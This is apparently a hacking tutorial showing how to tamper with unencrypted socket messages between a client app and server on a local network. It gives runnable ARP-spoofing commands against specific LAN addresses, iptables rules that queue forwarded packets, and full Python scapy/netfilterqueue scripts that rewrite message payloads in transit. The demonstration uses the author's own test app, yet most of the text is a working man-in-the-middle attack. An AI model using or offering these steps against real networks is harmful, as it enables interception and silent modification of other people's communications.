Hack any (not encrypted) communication
Modifying data transferred and received is one of the simplest ways to hack an app. For example, I created one that communicates with a server via sockets and they can exchange messages.
As a natural course of action, I also created a server.
If we type in the IP and press the “connect” button we will see a message that is sent by the server.
From the server’s point of view, we will see a message sent from a client.
Unfortunately for us, Burp Suite doesn’t see this as WebSocket or HTTP/HTTPS communication.
However, let’s not give up on that just yet. We can edit a network packet that is transmitted via our computer. To allow this action, type:
sysctl -w net.ipv4.ip_forward=1
Now we have to convince our chosen target device to send packets via our device. Let’s name some ways:
- ARP Spoofing
- Set gateway on target as our linux
- Connect device via prepared access point that is our linux
I prefer to use ARP Spoofing because the target server and our hacking device are in the same network.
arpspoof -i eth0 192.168.1.171 -t 192.168.1.250
arpspoof -i eth0 -t 192.168.1.171 192.168.1.250
Now we can send a request from app and we will see a packet in WireShark with the message from the client:
And also, from the server:
It’s not hard to tell that we only need to edit this packet to achieve our goal, and it’s not even difficult. First, we need to make a queue with packets, so we will be able to edit them:
iptables -I FORWARD -j NFQUEUE --queue-num 0
If the app is on your device, use these commands to queue local not forwarded packets
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0
To delete all queues, use”
iptables --flush
Now, if we make a request in the app, the app will hang, because the packet will not be transmitted to the server.
At this point. it’s time for some Python coding. Below is a handful of code lines that allow us to watch what we are able to edit. By the way it’s allows us to edit a lot of packets, for example DNS packets, HTTP requests, etc.
import scapy.all as scapy
import netfilterqueue
def handle_packet(packet): # method to handle packets
sp = scapy.IP(packet.get_payload()) # convert packet to scapy
sp.show() # show what it's in package
packet.accept() # remove packet from queue and forward
# start using queue with packets and use method handle_packets to handle packets
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, handle_packet)
queue.run()
After running the Python script and making a request in the app, we can find our packets which we want to edit.
If you don’t have needed dependencies, you can install them using commands:
pip3 install scapy
apt install python3-pip git libnfnetlink-dev libnetfilter-queue-dev
pip3 install -U git+https://github.com/kti/python-netfilterqueue
So, it’s time to write more evil code lines which will edit packets, For example, here’s some code that edits “load” if the packets contain “Test Message”.
import scapy.all as scapy
import netfilterqueue
def handle_packet(packet): # method to handle packets
sp = scapy.IP(packet.get_payload()) # convert packet to scapy
if sp.haslayer(scapy.Raw): # check if packet has Raw layer
load = sp[scapy.Raw].load.decode("utf-8") # decode message from bytes
if "Test Message" in load: # check method contains “Test Message”
print("Changing message: " + load.replace("\n","")) # print message before changing
load = load.replace("Test Message", 'Hacked Msg') # replace in packet message text “Test Message” to “Hacked Msg”
print("To message: " + load.replace("\n","") + "\n") # print message after changing
sp[scapy.Raw].load = load.encode('utf-8') # encode message to bytes
del sp[scapy.IP].len # delete for scapy to auto recalculate
del sp[scapy.IP].chksum # delete for scapy to auto recalculate
del sp[scapy.TCP].chksum # delete for scapy to auto recalculate
packet.set_payload(bytes(sp)) # set changed payload for packet
packet.accept() # remove packet from queue and forward
# start using queue with packets and use method handle_packets to handle packets
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, handle_packet)
queue.run()
Requests after running a new script will change from “Test Message…” to “Hacked Msg…” It’s visible from our script, application and server.